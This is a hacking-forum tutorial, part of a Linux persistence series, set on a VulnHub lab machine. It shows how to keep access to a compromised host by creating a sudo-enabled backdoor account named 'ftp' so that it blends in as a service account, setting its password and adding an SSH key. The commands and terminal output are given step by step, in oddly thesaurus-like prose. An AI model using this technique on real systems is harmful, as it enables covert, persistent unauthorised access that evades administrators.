[Linux Persistence] | PRIVILEGED LOCAL ACCOUNT - PART 3

Free Hacking Tutorials
User avatar
ethical hacker
Posts: 175
Joined: Thu Feb 29, 2024 10:48 pm

[Linux Persistence] | PRIVILEGED LOCAL ACCOUNT - PART 3

Postby ethical hacker » Tue Aug 13, 2024 4:04 am

Requirements:

  1. Kali Linux OR Parrot OS
  2. Practical understanding of T*****/IP
  3. The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
    https://www.vulnhub.com/entry/raven-1,256/

Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.

PART 3. CREATING A PRIVILEGED LOCAL ACCOUNT:
* Take note: You will require “root” permission in order to create a new user account on Linux systems.

The procedure for establishing a favoured local account for backdoor access is a technique that can be utilised to preserve access to a designated system if an individual account password has been altered. However, the creation of a local user account might potentially result in detection on servers that have fewer user and service accounts, as a new user would easily be discerned.

In order to elude detection, we will create a user account possessing a covert moniker. In this instance, we shall craft a user account denoted as “ftp” in order to assimilate as a service account.

We can generate the user account on the target by executing the following:

Code: Select all

useradd  -m -s /bin/bash ftp

Upon the formation of the account, it is imperative to incorporate the user into the “sudo” assembly, this will grant the user administrative latitude. This can be achieved by implementing the ensuing command:

Code: Select all

usermod -aG sudo ftp

Post the integration of the user account into the “sudo” group, it is mandatory to configure a passcode for the account. This can be accomplished by executing the ensuing command:

Code: Select all

passwd ftp

Upon stipulating the password, it is possible to enumerate the contents of the /etc/passwd file to confirm that the user account has been incorporated.
Terminal

Code: Select all

smmta:x:100:104:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:101:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
ethical:x:1001:1001::/home/ethical:/bin/sh
ftp:x:1002:1002::/home/ftp:/bin/bash


One may now verify the newly-established user account through SSH password authentication. Simultaneously, one can incorporate the generated SSH public key from the first segment into the "authorized_keys" file within the user account's home directory. [Linux Persistence] | VIA SSH KEYS - PART 1

Subsequent to verifying with the server via SSH, it is possible to ascertain that the user account possesses administrative authority by employing the "sudo" command.
Terminal

Code: Select all

ftp@ethical:/root$ cd ~
ftp@ethical:~$ sudo apt update

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

        #1) Respect the privacy of others.
        #2) Think before you type.
        #3) With great power comes great responsibility.

[sudo] password for ftp:


As illustrated in the aforementioned terminal, the user account exhibits administrative privileges and is capable of executing any directive on the device without engaging in contact with a "root" account.

This account serves as a means for backdoor access whenever the need arises, thereby circumventing the requirement to utilise the "root" account or any other legitimate user accounts on the targeted system, while still ensuring unfettered access to the target.

Return to “Hacking Tutorials”